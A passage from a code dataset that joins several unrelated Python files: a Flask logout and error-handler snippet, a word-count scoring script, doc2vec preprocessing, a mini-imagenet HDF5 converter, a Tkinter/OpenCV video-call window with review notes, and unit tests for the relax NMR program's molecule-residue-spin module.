    """Log the current user out, flash a notice, and redirect (``next`` or home)."""
    logout_user()
    flash('You have been logged out.', 'success')
    return redirect(request.args.get('next') or url_for('homepage'))
@app.errorhandler(404)
def page_not_found(e):
    """Render the custom 404 template with the proper status code."""
    return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):
    """Render the custom 500 template with the proper status code."""
    return render_template('500.html'), 500
24,122 | 6a9c69a0da1f311378439784d5f8a4c8742a3f38 | import collections
# Read the two word lists: announcing word w scores (#w in S) - (#w in T);
# print the best achievable score, never below 0 (say nothing to score 0).
N = int(input())
S = [input() for _ in range(N)]
M = int(input())
T = [input() for _ in range(M)]
# The original recomputed list.count() inside the loop (O(n^2) overall);
# counting each list once with Counter gives the same answer in O(n).
blue = collections.Counter(S)
red = collections.Counter(T)
maxi = max((blue[word] - red[word] for word in blue), default=0)
maxi = max(maxi, 0)
print(maxi)
24,123 | fd6eda51efee7bf056a18697f067b454916051ac | import pickle
import pandas as pd
import numpy as np
import gensim
# test_data = pd.read_csv('../test_preprocessed.csv', index_col=0)
# # test_data = test_data.head(100)
# model = gensim.models.doc2vec.Doc2Vec.load('../enwiki_dbow/doc2vec.bin')
#
# print('Extracting testing doc2vec features...')
#
# features_test = []
#
# for index, row in test_data.iterrows():
# q1 = row[0]
# q2 = row[1]
# if pd.notnull(q1) and pd.notnull(q2):
# q1 = q1.split(' ')
# q2 = q2.split(' ')
# elif not pd.notnull(q1):
# q1 = [' ']
# elif not pd.notnull(q2):
# q2 = [' ']
# q1_vec = model.infer_vector(q1)
# q2_vec = model.infer_vector(q2)
# feature = np.concatenate((q1_vec, q2_vec), axis=0)
# features_test.append(feature)
#
# print('Saving data...')
# np.save('features_test_doc2vec.npy', features_test)
#
# print('Trying to load data from file...')
# check = np.load('features_test_doc2vec.npy')
# print(check[:2])
# Collect every non-null question from both columns of the test set into one
# newline-separated text file.
test_data = pd.read_csv('../test_preprocessed.csv', index_col=0)
text = ''
# NOTE(review): this first write only creates/truncates the file with an
# empty string -- it is redundant, since the identical write below overwrites it.
with open('PETA_otazky.txt', 'w', encoding='utf-8') as file:
    file.write(text)
for index, row in test_data.iterrows():
    q1 = row[0]
    q2 = row[1]
    if pd.notnull(q1):
        text += q1 + '\n'
    if pd.notnull(q2):
        text += q2 + '\n'
with open('PETA_otazky.txt', 'w', encoding='utf-8') as file:
    file.write(text)
24,124 | 6d0703029d777f1561dc489cfe0ced2fb39187e0 | # from progressbar import ProgressBar, Percentage, Bar, ETA
import os
import sys
import h5py
import numpy as np
from PIL import Image
from boml.load_data.datasets.load_full_dataset import MINI_IMAGENET_FOLDER_RES84
def img_to_array_old(image_file, resize=84, flip=False, convert_to_gray=False):
    """Load ``image_file`` with PIL and return an H x W x 3 numpy array.

    resize:          square edge length (falsy keeps the original size)
    flip:            flip vertically (vaa3d stacks store Y reversed)
    convert_to_gray: collapse to single channel before the array conversion

    Grayscale results are re-stacked to 3 identical channels, and any alpha
    channel is dropped, so the result always has exactly 3 channels.
    """
    img_z = Image.open(image_file)
    # img_z.convert('RGB') # not useful at all...
    if resize:
        img_z = img_z.resize((resize, resize), Image.LANCZOS)
    if (
        flip
    ):  # when reading a stack saved in vaa3d format Y coordinates are reversed (used by save_subst
        img_z = img_z.transpose(Image.FLIP_TOP_BOTTOM)
    if convert_to_gray:
        img_z = img_z.convert("L")
    ary = np.array(img_z)
    ary = (
        np.stack((ary,) * 3, axis=2) if ary.ndim == 2 else ary
    )  # some images are black and white
    return (
        ary if ary.shape[-1] == 3 else ary[:, :, :3]
    )  # some images have an alpha channel... (unbelievable...)
def img_to_array(imfile, resize=84):
    """Load ``imfile`` as an RGB numpy array, optionally resized to a square.

    NOTE(review): ``scipy.misc.imread``/``imresize`` were removed in modern
    SciPy (>= 1.3) -- this only runs against an old pinned SciPy; confirm
    before upgrading (imageio/PIL are the usual replacements).
    """
    from scipy.misc import imresize, imread

    img = imread(imfile, mode="RGB")
    if resize:
        # noinspection PyTypeChecker
        img = imresize(img, size=(resize, resize, 3))
    return img
def images_to_tensor(files, tensor):
    """Load every image path in ``files`` and write it into row ``tensor[i]``.

    ``tensor`` is any indexable image stack (here: an h5py dataset), filled
    in the order of ``files``.  The commented-out lines are the optional
    progressbar feedback matching the commented import at the top of the file.
    """
    # widgets = [Percentage(), ' ', Bar(), ' ', ETA()]
    # pbar = ProgressBar(widgets=widgets, maxval=len(files))
    # pbar.start()
    for i, f in enumerate(files):
        print(f)
        tensor[i, :] = img_to_array(f)
        # pbar.update(i + 1)
    # pbar.finish()
def tensor_to_images(prefix, tensor):
    """Dump each slice ``tensor[z]`` as an 8-bit grayscale TIFF named
    ``<prefix>NNN.tif`` (zero-padded slice index).

    NOTE(review): ``astype(np.int8)`` is *signed*; PIL mode "L" expects
    unsigned 8-bit, so values above 127 would wrap -- confirm whether
    ``np.uint8`` was intended.
    """
    n = tensor.shape[0]
    # widgets = [Percentage(), ' ', Bar(), ' ', ETA()]
    # pbar = ProgressBar(widgets=widgets, maxval=n)
    # pbar.start()
    for z in range(n):
        img = Image.fromarray(tensor[z].astype(np.int8), mode="L")
        img.save(prefix + "%03d" % z + ".tif")
        # pbar.update(z + 1)
    # pbar.finish()
def convert_mini_imagenet(_folder=None, resize=None):
    """Pack the train/val/test image folders of mini-imagenet into one HDF5
    file per split, each holding a dataset "X" of shape (n, H, W, C), uint8.

    _folder: root directory containing train/, val/ and test/ subfolders
             (defaults to MINI_IMAGENET_FOLDER_RES84).
    resize:  optional square edge length forwarded to img_to_array().
    """
    for split in ["train", "val", "test"]:
        folder = os.path.join(_folder or MINI_IMAGENET_FOLDER_RES84, split)
        classes = os.listdir(folder)
        files = []
        for c in classes:
            class_dir = os.path.join(folder, c)
            files += [os.path.join(class_dir, f) for f in os.listdir(class_dir)]
        n = len(files)
        # Probe the first image to size the dataset.
        img_shape = img_to_array(files[0], resize=resize).shape
        h5file = h5py.File(
            os.path.join(_folder or MINI_IMAGENET_FOLDER_RES84, "%s.h5" % split), "w"
        )
        try:
            X = h5file.create_dataset(
                "X", (n, img_shape[0], img_shape[1], img_shape[2]), dtype=np.uint8
            )
            images_to_tensor(files, X)
        finally:
            # Bug fix: the original never closed the file, risking an
            # unflushed/corrupt HDF5 if the process exits mid-split.
            h5file.close()
if __name__ == "__main__":
    # CLI: optional first argument overrides the dataset root; no resizing.
    convert_mini_imagenet(sys.argv[1] if len(sys.argv) > 1 else None, resize=None)
# base = '../vasculature_data'
# orig_files = ['{}/orig/097000_164000_08600000{:0>2d}.tif'.format(base, z) for z in range(100)]
# target_files = ['{}/GT/097000_164000_086000-labels-stack-intero-smooth00{:0>2d}.tif'.format(base, z) for z in range(100)]
#
# assert(len(orig_files) == len(target_files))
# n = len(orig_files)
# img_shape = img_to_array(orig_files[0]).shape
#
# h5file = h5py.File('vasculature.h5', 'w')
# X = h5file.create_dataset("X", (n,img_shape[0],img_shape[1]), h5py.h5t.NATIVE_FLOAT)
# y = h5file.create_dataset("y", (n,img_shape[0],img_shape[1]), h5py.h5t.NATIVE_FLOAT)
# images_to_tensor(orig_files, X, 65535.)
# images_to_tensor(target_files, y, 255.)
# h5file.close()
#
# base = '../vasculature_data'
# orig_files = ['{}/orig/097000_164000_08600000{:0>2d}.tif'.format(base, z) for z in range(100)]
# target_files = ['{}/GT/097000_164000_086000-labels-stack-intero-smooth00{:0>2d}.tif'.format(base, z) for z in
# range(100)]
|
24,125 | db89612c8f46583d7fab71ebc68f4fb93548ee60 | '''
Created on 09-May-2013
@author: Devangini
'''
import sys
from optparse import OptionParser
import expressionreco.FaceTracker
import cv2
import cv2.cv as cv
from expressionreco import FaceTracker
import Tkinter as tk
from PIL import Image, ImageTk
from ttk import Style
from Tkconstants import BOTH
from config.CameraConstants import _CameraConstants
DATADIR = "E:\\python workspace\\CharlieCode\\data\\"
HCDIR = "E:\\Softwares\\opencv\\data\\haarcascades\\"
DATADIR2 = "E:\\Softwares\\opencv\\data\\extracascades\\"
class VideoCall:
    """Tkinter + OpenCV video-call window (Python 2 code: print statements,
    old ``cv2.cv`` bindings, ``Tkinter`` module names).

    Shows the local camera feed on a canvas at ~1 ms refresh and can
    optionally run the expression-recognition FaceTracker on a second camera.
    """
    def openCallWindow(self, topWindow):
        """Build the call UI inside an existing toplevel and start both cameras.

        NOTE(review): VideoCall defines no pack() method, so self.pack(...)
        below raises AttributeError -- it looks like self.frame.pack(...)
        was intended; confirm.
        """
        print "open call window"
        self.topWindow = topWindow
        self.frame = tk.Frame(topWindow)
        self.topWindow.title("Charlie : UI")
        self.style = Style()
        self.style.theme_use("default")
        self.pack(fill=BOTH, expand=1)
        self.frame.grid()
        cameraIndex = 0
        cameraIndex2 = 2
        # RecordAndPlay.recordAndPlay()
        self.startVideo(cameraIndex, cameraIndex2)
        self.callFaceTracker(cameraIndex2)
    def update_video(self):
        """Grab one frame, paint it on the canvas, and reschedule itself (~1 ms)."""
        (self.readsuccessful, self.f) = self.cam.read()
        self.gray_im = cv2.cvtColor(self.f, cv2.COLOR_RGB2BGRA)
        # self.gray_im = cv2.cvtColor(self.f, cv2.COLOR_RGB2GRAY)
        self.a = Image.fromarray(self.gray_im)
        # Keeping the PhotoImage on self prevents it from being
        # garbage-collected while the canvas still displays it.
        self.b = ImageTk.PhotoImage(image=self.a)
        self.canvas.create_image(0, 0, image=self.b, anchor=tk.NW)
        self.topWindow.update()
        # call facetracker
        # (readsuccessful, f) = self.cam2.read()
        # imageArray = f
        # imageFrame = cv.CreateImageHeader((imageArray.shape[1], imageArray.shape[0]), cv.IPL_DEPTH_8U, 3)
        # cv.SetData(imageFrame, imageArray.tostring(),
        # imageArray.dtype.itemsize * 3 * imageArray.shape[1])
        # self.tracker.detect_and_draw(imageFrame, self.cascade, self.cascade2, self.cascade3)
        self.topWindow.after(1, self.update_video)
    def trial(self):
        """Standalone entry point: create the root window and start the feed."""
        self.topWindow = tk.Tk()
        cameraIndex = 0
        cameraIndex2 = 2
        self.startVideo(cameraIndex, cameraIndex2)
        # self.callFaceTracker(cameraIndex2)
    def startVideo(self, cameraIndex, cameraIndex2):
        """Lay out the video canvas plus expression buttons and run mainloop().

        Blocks in mainloop() until the window closes, then drops the camera.
        """
        masterPane = tk.Frame(self.topWindow)
        masterPane.pack()
        videoframe = tk.LabelFrame(masterPane, text='Captured video')
        videoframe.grid(column=0, row=0, columnspan=1, rowspan=1, padx=5, pady=5, ipadx=5, ipady=5)
        self.cam = cv2.VideoCapture(cameraIndex) # 2)
        CameraConstants = _CameraConstants()
        self.cam.set(cv.CV_CAP_PROP_FRAME_WIDTH, CameraConstants.cameraWidth())
        self.cam.set(cv.CV_CAP_PROP_FRAME_HEIGHT, CameraConstants.cameraHeight())
        # cv.SetCaptureProperty(self.cam, cv.CV_CAP_PROP_FRAME_WIDTH, width)
        # cv.SetCaptureProperty(self.cam, cv.CV_CAP_PROP_FRAME_HEIGHT, height)
        self.canvas = tk.Canvas(videoframe, width=(CameraConstants.cameraWidth()), height=(CameraConstants.cameraHeight()))
        self.canvas.grid(column=0, row=0)
        # self.cam2 = cv2.VideoCapture(cameraIndex2)
        self.topWindow.after(0, self.update_video)
        labelName = tk.Label(masterPane, text="Hello, world!")
        labelName.grid(column=0, row=3)
        path = 'E:\python workspace\CharlieCode\emoticon_smile.png'
        # image = Image.open(path)
        # NOTE(review): ``img`` is a local -- unlike self.b above it is not
        # kept alive anywhere, and it is never attached to a widget.
        img = ImageTk.PhotoImage(Image.open(path))
        # panel = tk.Label(root, image = img)
        # panel.pack(side = "bottom", fill = "both", expand = "yes")
        smileButton = tk.Button(masterPane, text="Smile")
        smileButton.grid(row=1, column=1)
        sadButton = tk.Button(masterPane, text="Frown")
        sadButton.grid(row=4, column=1)
        surpriseButton = tk.Button(masterPane, text="Surprise")
        surpriseButton.grid(row=2, column=1)
        neutralButton = tk.Button(masterPane, text="Neutral")
        neutralButton.grid(row=3, column=1)
        # photo = ImageTk.PhotoImage(image)
        # smileButton = tk.Button(self.topWindow, image=photo, \
        # command=self.smileCharlie)
        #
        # smileButton.grid(row=0, column=4)
        # label = tk.Label(self.topWindow, image=photo)
        # label.image = photo # keep a reference!
        # label.grid(row = 4, column = 1)
        # label.pack()
        self.topWindow.mainloop()
        del self.cam
    def callFaceTracker(self, cameraIndex2):
        """Load the Haar cascades and run one face/eye/mouth detection pass.

        NOTE(review): self.cam2 is never created (its assignment in
        startVideo is commented out), so the read() below would raise
        AttributeError -- confirm before re-enabling this path.
        """
        arguments = (str(cameraIndex2))
        sys.argv = ["FaceTracker.py"] + list(arguments)
        # sys.argv = ["testing mainf"] + list(m_args)
        parser = OptionParser(usage="usage: %prog [options] [filename|camera_index]")
        parser.add_option("-c", "--cascade", action="store", dest="cascade", type="str", help="Haar cascade file, default %default", default=HCDIR + "haarcascade_frontalface_alt_tree.xml")
        # parser.add_option("-c", "--cascade", action="store", dest="cascade", type="str", help="Haar cascade file, default %default", default = "../data/haarcascades/haarcascade_frontalface_alt.xml")
        (options, args) = parser.parse_args()
        self.cascade = cv.Load(options.cascade)
        # detect eyes
        self.cascade2 = cv.Load(DATADIR2 + "haarcascade eye.xml")
        # cascade2 = cv.Load(HCDIR + "..\\eyes\\eye.xml")
        # cascade3 = cv.Load(HCDIR + "haarcascade_mcs_mouth.xml")
        self.cascade3 = cv.Load(DATADIR2 + "Mouth.xml")
        if len(args) != 1:
            parser.print_help()
            sys.exit(1)
        # input_name = args[0]
        # if input_name.isdigit():
        # capture = cv.CreateCameraCapture(int(input_name))
        # else:
        # capture = None
        # cv.NamedWindow("result", 1)
        frame_copy = self.cam2.read() # self.cam.read()
        imageArray = frame_copy[1]
        imageFrame = cv.CreateImageHeader((imageArray.shape[1], imageArray.shape[0]), cv.IPL_DEPTH_8U, 3)
        cv.SetData(imageFrame, imageArray.tostring(),
                   imageArray.dtype.itemsize * 3 * imageArray.shape[1])
        # imageArray = np.zeros(())
        self.tracker = FaceTracker.FaceTracker()
        # print frame_copy.shape
        self.tracker.detect_and_draw(imageFrame, self.cascade, self.cascade2, self.cascade3)
        # cv2.cv.iplimage
        # if capture:
        # frame_copy = None
        # while True:
        # frame = cv.QueryFrame(capture)
        # if not frame:
        # cv.WaitKey(0)
        # break
        # if not frame_copy:
        # frame_copy = cv.CreateImage((frame.width,frame.height),
        # cv.IPL_DEPTH_8U, frame.nChannels)
        # if frame.origin == cv.IPL_ORIGIN_TL:
        # cv.Copy(frame, frame_copy)
        # else:
        # cv.Flip(frame, frame_copy, 0)
        #
        # FaceTracker.detect_and_draw(frame_copy, cascade, cascade2, cascade3)
        #
        # if cv.WaitKey(10) >= 0:
        # break
        # else:
        # image = cv.LoadImage(input_name, 1)
        # FaceTracker.detect_and_draw(image, cascade)
        # cv.WaitKey(0)
        # cv.DestroyWindow("result")
    def smileCharlie(self):
        """Callback stub for the (commented-out) smile button."""
        print "charlie smiling!!!"
if __name__ == '__main__':
    # Manual test entry point: build the Tk window and start the camera loop.
    call = VideoCall()
    call.trial()
    # call.callFaceTracker()
|
24,126 | 5e8713294b4952a7402d11ea673ea2682685d8d4 | ###############################################################################
# #
# Copyright (C) 2007-2014 Edward d'Auvergne #
# #
# This file is part of the program relax (http://www.nmr-relax.com). #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
# relax module imports.
from data_store import Relax_data_store; ds = Relax_data_store()
from pipe_control import mol_res_spin, pipes
from pipe_control.reset import reset
from lib.errors import RelaxError, RelaxNoPipeError
from test_suite.unit_tests.base_classes import UnitTestCase
class Test_mol_res_spin(UnitTestCase):
    """Unit tests for the functions of the 'pipe_control.mol_res_spin' module.

    Note: the deprecated unittest.TestCase aliases failUnless(), failIf()
    and assert_() have been replaced by assertTrue()/assertFalse(); the
    aliases were removed from unittest in Python 3.12.
    """

    def setUp(self):
        """Set up some molecules, residues, and spins for testing."""
        # Add a data pipe to the data store.
        ds.add(pipe_name='orig', pipe_type='mf')
        # Name the first molecule.
        cdp.mol[0].name = 'Ap4Aase'
        # Add a second molecule to the system.
        cdp.mol.add_item(mol_name='RNA')
        # Add two more residues to the first molecule (and set the residue number of the first).
        cdp.mol[0].res[0].num = 1
        cdp.mol[0].res.add_item(res_num=2, res_name='Glu')
        cdp.mol[0].res.add_item(res_num=4, res_name='Pro')
        # Add some spin info to this molecule.
        cdp.mol[0].res[0].spin[0].name = 'NH'
        cdp.mol[0].res[0].spin[0].num = 60
        cdp.mol[0].res[1].spin[0].name = 'NH'
        cdp.mol[0].res[1].spin[0].num = 63
        # Add one more residue to the second molecule (and set the residue number of the first).
        cdp.mol[1].res[0].num = -5
        cdp.mol[1].res.add_item(res_num=-4)
        # Add a second set of spins to the second molecule (naming the first set first).
        cdp.mol[1].res[0].spin[0].name = 'C8'
        cdp.mol[1].res[1].spin[0].name = 'C8'
        cdp.mol[1].res[0].spin.add_item(spin_name='N5')
        cdp.mol[1].res[1].spin.add_item(spin_name='N5')
        cdp.mol[1].res[1].spin.add_item(spin_name='2H', spin_num=132)
        # Deselect a number of spins.
        cdp.mol[0].res[0].spin[0].select = 0
        cdp.mol[0].res[2].spin[0].select = 0
        cdp.mol[1].res[0].spin[0].select = 0
        cdp.mol[1].res[1].spin[1].select = 0
        # Update the metadata.
        mol_res_spin.metadata_update()

    def test_count_spins(self):
        """Test that the number of spins can be properly counted.

        The function tested is pipe_control.mol_res_spin.count_spins().
        """
        # Test the number of spins counted.
        self.assertEqual(mol_res_spin.count_spins(), 4)
        self.assertEqual(mol_res_spin.count_spins(skip_desel=False), 8)
        self.assertEqual(mol_res_spin.count_spins(selection='@N5'), 1)
        self.assertEqual(mol_res_spin.count_spins(selection='@N5', skip_desel=False), 2)

    def test_count_no_spins(self):
        """Test that the number of spins (zero) can be properly counted.

        The function tested is pipe_control.mol_res_spin.count_spins().
        """
        # Reset relax.
        reset()
        # Add a data pipe to the data store.
        ds.add(pipe_name='orig', pipe_type='mf')
        # Test the number of spins counted.
        self.assertEqual(mol_res_spin.count_spins(), 0)

    def test_count_spins_no_pipe(self):
        """Test that the counting of the number of spins raises an error when no pipe exists.

        The function tested is pipe_control.mol_res_spin.count_spins().
        """
        # Reset relax.
        reset()
        # Test for the error.
        self.assertRaises(RelaxNoPipeError, mol_res_spin.count_spins)

    def test_exists_mol_res_spin_data(self):
        """Test the function for determining if molecule-residue-spin data exists.

        The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
        """
        # This should be True.
        self.assertTrue(mol_res_spin.exists_mol_res_spin_data())

    def test_exists_mol_res_spin_data_single_mol(self):
        """Determine if molecule-residue-spin data exists (with data for a single molecule).

        The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
        """
        # Reset relax.
        reset()
        # Add a data pipe to the data store.
        ds.add(pipe_name='orig', pipe_type='mf')
        dp = pipes.get_pipe('orig')
        # Name the first molecule.
        dp.mol[0].name = 'TOM40'
        # This should be True.
        self.assertTrue(mol_res_spin.exists_mol_res_spin_data())

    def test_exists_mol_res_spin_data_single_res_name(self):
        """Determine if molecule-residue-spin data exists (when a single residue is named).

        The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
        """
        # Reset relax.
        reset()
        # Add a data pipe to the data store.
        ds.add(pipe_name='orig', pipe_type='mf')
        dp = pipes.get_pipe('orig')
        # Name the first residue.
        dp.mol[0].res[0].name = 'Lys'
        # This should be True.
        self.assertTrue(mol_res_spin.exists_mol_res_spin_data())

    def test_exists_mol_res_spin_data_single_res_num(self):
        """Determine if molecule-residue-spin data exists (when a single residue is numbered).

        The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
        """
        # Reset relax.
        reset()
        # Add a data pipe to the data store.
        ds.add(pipe_name='orig', pipe_type='mf')
        dp = pipes.get_pipe('orig')
        # Number the first residue.
        dp.mol[0].res[0].num = 1
        # This should be True.
        self.assertTrue(mol_res_spin.exists_mol_res_spin_data())

    def test_exists_mol_res_spin_data_single_spin_name(self):
        """Determine if molecule-residue-spin data exists (when a single spin is named).

        The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
        """
        # Reset relax.
        reset()
        # Add a data pipe to the data store.
        ds.add(pipe_name='orig', pipe_type='mf')
        dp = pipes.get_pipe('orig')
        # Name the first spin.
        dp.mol[0].res[0].spin[0].name = 'NH'
        # This should be True.
        self.assertTrue(mol_res_spin.exists_mol_res_spin_data())

    def test_exists_mol_res_spin_data_single_spin_num(self):
        """Determine if molecule-residue-spin data exists (when a single spin is numbered).

        The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
        """
        # Reset relax.
        reset()
        # Add a data pipe to the data store.
        ds.add(pipe_name='orig', pipe_type='mf')
        dp = pipes.get_pipe('orig')
        # Number the first spin.
        dp.mol[0].res[0].spin[0].num = 234
        # This should be True.
        self.assertTrue(mol_res_spin.exists_mol_res_spin_data())

    def test_exists_mol_res_spin_data_no_data(self):
        """Determine if molecule-residue-spin data exists when no data exists.

        The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
        """
        # Reset relax.
        reset()
        # Add a data pipe to the data store.
        ds.add(pipe_name='orig', pipe_type='mf')
        # This should be False.
        self.assertFalse(mol_res_spin.exists_mol_res_spin_data())

    def test_exists_mol_res_spin_data_no_pipe(self):
        """Determine if molecule-residue-spin data exists when no data pipe exists.

        The function tested is pipe_control.mol_res_spin.exists_mol_res_spin_data().
        """
        # Reset relax.
        reset()
        # This should fail.
        self.assertRaises(RelaxNoPipeError, mol_res_spin.exists_mol_res_spin_data)

    def test_format_info_full1(self):
        """Test the format_info_full() function for all combinations of input."""
        # The spin info and expected string - covering all possible combinations.
        info = [
            # 5 bits of info.
            {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': "Molecule Ubi, residue Ala 10, spin N 200"},
            # 4 bits of info.
            {'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': "Residue Ala 10, spin N 200"},
            {'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': "Molecule Ubi, residue 10, spin N 200"},
            {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': "Molecule Ubi, residue Ala, spin N 200"},
            {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': "Molecule Ubi, residue Ala 10, spin 200"},
            {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': "Molecule Ubi, residue Ala 10, spin N"},
            # 3 bits of info.
            {'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': 200, 'string': "Residue 10, spin N 200"},
            {'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': "Residue Ala, spin N 200"},
            {'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': "Residue Ala 10, spin 200"},
            {'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': "Residue Ala 10, spin N"},
            {'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': "Molecule Ubi, spin N 200"},
            {'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': "Molecule Ubi, residue 10, spin 200"},
            {'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': "Molecule Ubi, residue 10, spin N"},
            {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': "Molecule Ubi, residue Ala, spin 200"},
            {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': "Molecule Ubi, residue Ala, spin N"},
            {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': "Molecule Ubi, residue Ala 10"},
            # 2 bits of info.
            {'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': 200, 'string': "Spin N 200"},
            {'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': 200, 'string': "Residue 10, spin 200"},
            {'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': 'N', 'spin_num': None, 'string': "Residue 10, spin N"},
            {'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': "Residue Ala, spin 200"},
            {'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': "Residue Ala, spin N"},
            {'mol_name': None, 'res_name': 'Ala', 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': "Residue Ala 10"},
            {'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': "Molecule Ubi, spin 200"},
            {'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': "Molecule Ubi, spin N"},
            {'mol_name': 'Ubi', 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': "Molecule Ubi, residue 10"},
            {'mol_name': 'Ubi', 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': "Molecule Ubi, residue Ala"},
            # 1 bit of info.
            {'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': 200, 'string': "Spin 200"},
            {'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': 'N', 'spin_num': None, 'string': "Spin N"},
            {'mol_name': None, 'res_name': None, 'res_num': 10, 'spin_name': None, 'spin_num': None, 'string': "Residue 10"},
            {'mol_name': None, 'res_name': 'Ala', 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': "Residue Ala"},
            {'mol_name': 'Ubi', 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': "Molecule Ubi"},
            # 0 bits of info.
            {'mol_name': None, 'res_name': None, 'res_num': None, 'spin_name': None, 'spin_num': None, 'string': ""},
        ]
        # Printout.
        print("Checking %s combinations." % len(info))
        # Create and check each string.
        for i in range(len(info)):
            print("    Checking %s" % info[i])
            string = mol_res_spin.format_info_full(mol_name=info[i]['mol_name'], res_name=info[i]['res_name'], res_num=info[i]['res_num'], spin_name=info[i]['spin_name'], spin_num=info[i]['spin_num'])
            self.assertEqual(string, info[i]['string'])

    def test_generate_spin_id_data_array1(self):
        """First test of the spin ID generation function.

        The function tested is pipe_control.mol_res_spin.generate_spin_id_data_array().
        """
        # The data.
        data = ['1', 'GLY']
        # The ID.
        id = mol_res_spin.generate_spin_id_data_array(data, res_num_col=1, res_name_col=2)
        # Test the string.
        self.assertEqual(id, ':1')

    def test_generate_spin_id_data_array2(self):
        """Second test of the spin ID generation function.

        The function tested is pipe_control.mol_res_spin.generate_spin_id_data_array().
        """
        # The data.
        data = ['1', 'GLY', '234', 'NH']
        # The ID.
        id = mol_res_spin.generate_spin_id_data_array(data, res_num_col=1, res_name_col=2, spin_num_col=3, spin_name_col=4)
        # Test the string.
        self.assertEqual(id, ':1@234')

    def test_generate_spin_id_data_array3(self):
        """Third test of the spin ID generation function.

        The function tested is pipe_control.mol_res_spin.generate_spin_id_data_array().
        """
        # The data.
        data = ['Ap4Aase', '234', 'NH']
        # The ID.
        id = mol_res_spin.generate_spin_id_data_array(data, mol_name_col=1, res_num_col=None, res_name_col=None, spin_num_col=2, spin_name_col=3)
        # Test the string.
        self.assertEqual(id, '#Ap4Aase@234')

    def test_generate_spin_id_data_array4(self):
        """Fourth test of the spin ID generation function.

        The function tested is pipe_control.mol_res_spin.generate_spin_id_data_array().
        """
        # The data.
        data = ['Ap4Aase', '1', 'GLY']
        # The ID.
        id = mol_res_spin.generate_spin_id_data_array(data, mol_name_col=1, res_num_col=2, res_name_col=3)
        # Test the string.
        self.assertEqual(id, '#Ap4Aase:1')

    def test_generate_spin_id_data_array5(self):
        """Fifth test of the spin ID generation function.

        The function tested is pipe_control.mol_res_spin.generate_spin_id_data_array().
        """
        # The data.
        data = ['Ap4Aase', '1', 'GLY', '234', 'NH']
        # The ID.
        id = mol_res_spin.generate_spin_id_data_array(data, mol_name_col=1, res_num_col=2, res_name_col=3, spin_num_col=4, spin_name_col=5)
        # Test the string.
        self.assertEqual(id, '#Ap4Aase:1@234')

    def test_generate_spin_id_data_array6(self):
        """Sixth test of the spin ID generation function.

        The function tested is pipe_control.mol_res_spin.generate_spin_id_data_array().
        """
        # The data.
        data = ['1', 'GLY', None, None]
        # The ID.
        id = mol_res_spin.generate_spin_id_data_array(data, res_num_col=1, res_name_col=2)
        # Test the string.
        self.assertEqual(id, ':1')

    def test_molecule_loop(self):
        """Test the proper operation of the molecule loop with molecule selection.

        The function tested is pipe_control.mol_res_spin.molecule_loop().
        """
        # Loop over the molecules.
        for mol in mol_res_spin.molecule_loop('#RNA'):
            # Test the molecule name.
            self.assertEqual(mol.name, 'RNA')
        # Test loop length.
        self.assertEqual(len(list(mol_res_spin.molecule_loop('#RNA'))), 1)

    def test_molecule_loop_no_data(self):
